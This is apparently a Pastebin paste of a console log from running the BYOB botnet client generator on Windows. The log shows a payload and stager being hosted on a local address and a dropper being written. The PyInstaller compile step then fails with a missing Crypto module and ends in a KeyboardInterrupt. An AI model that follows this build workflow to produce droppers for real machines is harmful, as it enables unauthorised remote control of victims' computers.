Advertisement
Guest User

Untitled

a guest
Aug 20th, 2019
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.06 KB | None | 0 0
  1. C:\Users\MYNAME\Desktop\byob\byob-master\byob>python client.py 10.0.2.15 8080 --freeze
  2.  
  3.  
  4. 88 88
  5. 88 88
  6. 88 88
  7. 88,dPPYba, 8b d8 ,adPPYba, 88,dPPYba,
  8. 88P' "8a `8b d8' a8" "8a 88P' "8a
  9. 88 d8 `8b d8' 8b d8 88 d8
  10. 88b, ,a8" `8b,d8' "8a, ,a8" 88b, ,a8"
  11. 8Y"Ybbd8"' Y88' `"YbbdP"' 8Y"Ybbd8"'
  12. d8'
  13. d8'
  14.  
  15.  
  16. [>] Modules
  17. Adding modules... -(3 modules added to client)
  18.  
  19. [>] Imports
  20. Adding imports... (26 imports from 3 modules)
  21.  
  22. [>] Payload
  23. Uploading payload... (hosting payload at: http://10.0.2.15:8081///payloads/uhl.py)
  24.  
  25. [>] Stager
  26. Uploading stager... -(hosting stager at: http://10.0.2.15:8081///stagers/uhl.py)
  27.  
  28. [>] Dropper
  29. Writing dropper... (339 bytes written to byob_uhl.py)
  30. Compiling executable...
  31. 79 INFO: PyInstaller: 3.5
  32. 79 INFO: Python: 3.7.4
  33. 79 INFO: Platform: Windows-10-10.0.18362-SP0
  34. 79 INFO: UPX is not available.
  35. Traceback (most recent call last):
  36. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\archive\pyz_crypto.py", line 33, in get_crypto_hiddenimports
  37. import_aes(modname)
  38. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\archive\pyz_crypto.py", line 21, in import_aes
  39. return __import__(module_name, fromlist=[module_name.split('.')[-1]])
  40. ModuleNotFoundError: No module named 'Crypto'
  41.  
  42. During handling of the above exception, another exception occurred:
  43.  
  44. Traceback (most recent call last):
  45. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\runpy.py", line 193, in _run_module_as_main
  46. "__main__", mod_spec)
  47. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\runpy.py", line 85, in _run_code
  48. exec(code, run_globals)
  49. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\__main__.py", line 118, in <module>
  50. run()
  51. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\__main__.py", line 111, in run
  52. run_build(pyi_config, spec_file, **vars(args))
  53. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\__main__.py", line 63, in run_build
  54. PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs)
  55. File "C:\Users\MYNAME\AppData\Local\Programs\Python\Python37-32\lib\site-packages\PyInstaller\building\build_main.py", line 844, in main
  56. Traceback (most recent call last):
  57. File "client.py", line 438, in <module>
  58. main()
  59. File "client.py", line 192, in main
  60. dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager)
  61. File "client.py", line 420, in _dropper
  62. name = generators.freeze(name, icon=options.icon, hidden=kwargs['hidden'])
  63. File "C:\Users\MYNAME\Desktop\byob\byob-master\byob\core\generators.py", line 250, in freeze
  64. time.sleep(0.25)
  65. KeyboardInterrupt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement